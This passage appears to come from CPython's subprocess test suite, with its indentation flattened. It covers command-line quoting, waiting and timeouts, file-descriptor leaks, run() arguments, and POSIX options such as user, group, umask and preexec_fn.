stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen(ZERO_RETURN_CMD)
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
self.assertEqual(p.wait(timeout=support.SHORT_TIMEOUT), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen(ZERO_RETURN_CMD, None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=support.SHORT_TIMEOUT)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_repr(self):
# Run a command that waits for user input, to check the repr() of
# a Proc object while and after the sub-process runs.
code = 'import sys; input(); sys.exit(57)'
cmd = [sys.executable, '-c', code]
result = "<Popen: returncode: {}"
with subprocess.Popen(
cmd, stdin=subprocess.PIPE, universal_newlines=True) as proc:
self.assertIsNone(proc.returncode)
self.assertTrue(
repr(proc).startswith(result.format(proc.returncode)) and
repr(proc).endswith('>')
)
proc.communicate(input='exit...\n')
proc.wait()
self.assertIsNotNone(proc.returncode)
self.assertTrue(
repr(proc).startswith(result.format(proc.returncode)) and
repr(proc).endswith('>')
)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
ZERO_RETURN_CMD, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
def test_class_getitems(self):
self.assertIs(subprocess.Popen[bytes], subprocess.Popen)
self.assertIs(subprocess.CompletedProcess[str], subprocess.CompletedProcess)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = subprocess.run(ZERO_RETURN_CMD, check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
# the name of a command that can be run without
# any arguments that exit fast
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
# This test _might_ wind up a bit fragile on loaded build+test machines
# as it depends on the timing with wide enough margins for normal situations
# but does assert that it happened "soon enough" to believe the right thing
# happened.
@unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
def test_run_with_shell_timeout_and_capture_output(self):
"""Output capturing after a timeout mustn't hang forever on open filehandles."""
before_secs = time.monotonic()
try:
subprocess.run('sleep 3', shell=True, timeout=0.1,
capture_output=True) # New session unspecified.
except subprocess.TimeoutExpired as exc:
after_secs = time.monotonic()
stacks = traceback.format_exc() # assertRaises doesn't give this.
else:
self.fail("TimeoutExpired not raised.")
self.assertLess(after_secs - before_secs, 1.5,
msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
f"{stacks}```")
def _get_test_grp_name():
for name_group in ('staff', 'nogroup', 'grp', 'nobody', 'nfsnobody'):
if grp:
try:
grp.getgrnam(name_group)
except KeyError:
continue
return name_group
else:
raise unittest.SkipTest('No identified group name to use for this test on this platform.')
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead captures the exception that we want to see
# below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment; that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
@unittest.skipUnless(hasattr(os, 'setreuid'), 'no setreuid on platform')
def test_user(self):
# For code coverage of the user parameter. We don't care if we get an
# EPERM error from it depending on the test execution environment; that
# still indicates that it was called.
uid = os.geteuid()
test_users = [65534 if uid != 65534 else 65533, uid]
name_uid = "nobody" if sys.platform != 'darwin' else "unknown"
if pwd is not None:
try:
pwd.getpwnam(name_uid)
test_users.append(name_uid)
except KeyError:
# unknown user name
name_uid = None
for user in test_users:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(user=user, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getuid())"],
user=user,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
except OSError as e:
if e.errno not in (errno.EACCES, errno.EPERM):
raise
else:
if isinstance(user, str):
user_uid = pwd.getpwnam(user).pw_uid
else:
user_uid = user
child_user = int(output)
self.assertEqual(child_user, user_uid)
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=-1)
if pwd is None and name_uid is not None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=name_uid)
@unittest.skipIf(hasattr(os, 'setreuid'), 'setreuid() available on platform')
def test_user_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=65535)
@unittest.skipUnless(hasattr(os, 'setregid'), 'no setregid() on platform')
def test_group(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
if grp is not None:
group_list.append(name_group)
for group in group_list + [gid]:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(group=group, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getgid())"],
group=group,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
else:
if isinstance(group, str):
group_gid = grp.getgrnam(group).gr_gid
else:
group_gid = group
child_group = int(output)
self.assertEqual(child_group, group_gid)
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=-1)
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=name_group)
@unittest.skipIf(hasattr(os, 'setregid'), 'setregid() available on platform')
def test_group_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=65535)
@unittest.skipUnless(hasattr(os, 'setgroups'), 'no setgroups() on platform')
def test_extra_groups(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
perm_error = False
if grp is not None:
group_list.append(name_group)
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os, sys, json; json.dump(os.getgroups(), sys.stdout)"],
extra_groups=group_list)
except OSError as ex:
if ex.errno != errno.EPERM:
raise
perm_error = True
else:
parent_groups = os.getgroups()
child_groups = json.loads(output)
if grp is not None:
desired_gids = [grp.getgrnam(g).gr_gid if isinstance(g, str) else g
for g in group_list]
else:
desired_gids = group_list
if perm_error:
self.assertEqual(set(child_groups), set(parent_groups))
else:
self.assertEqual(set(desired_gids), set(child_groups))
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[-1])
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
extra_groups=[name_group])
@unittest.skipIf(hasattr(os, 'setgroups'), 'setgroups() available on platform')
def test_extra_groups_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[])
@unittest.skipIf(mswindows or not hasattr(os, 'umask'),
'POSIX umask() is not available.')
def test_umask(self):
tmpdir = None
try:
tmpdir = tempfile.mkdtemp()
name = os.path.join(tmpdir, "beans")
# Set an unusual umask in the child so that the file it creates
# has a distinctive mode we can test for.
subprocess.check_call(
[sys.executable, "-c", f"open({name!r}, 'w').close()"],
umask=0o053)
# Ignore execute permissions entirely in our test,
# filesystems could be mounted to ignore or force that.
st_mode = os.stat(name).st_mode & 0o666
expected_mode = 0o624
self.assertEqual(expected_mode, st_mode,
msg=f'{oct(expected_mode)} != {oct(st_mode)}')
finally:
if tmpdir is not None:
shutil.rmtree(tmpdir)
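# Worked example of the arithmetic the test above relies on: open(name, 'w')
# requests mode 0o666 and the kernel clears the umask bits, so with
# umask=0o053 the file ends up with 0o666 & ~0o053 == 0o624, which is
# exactly expected_mode (execute bits are deliberately masked out).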
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
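# Reminder of the POSIX convention checked above: Popen.returncode is the
# exit status for a normal exit and -N when the child was killed by signal
# N, so a SIGABRT death yields returncode == -signal.SIGABRT.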
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals IntEnum to provide
# the word "signal", the signal name, and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
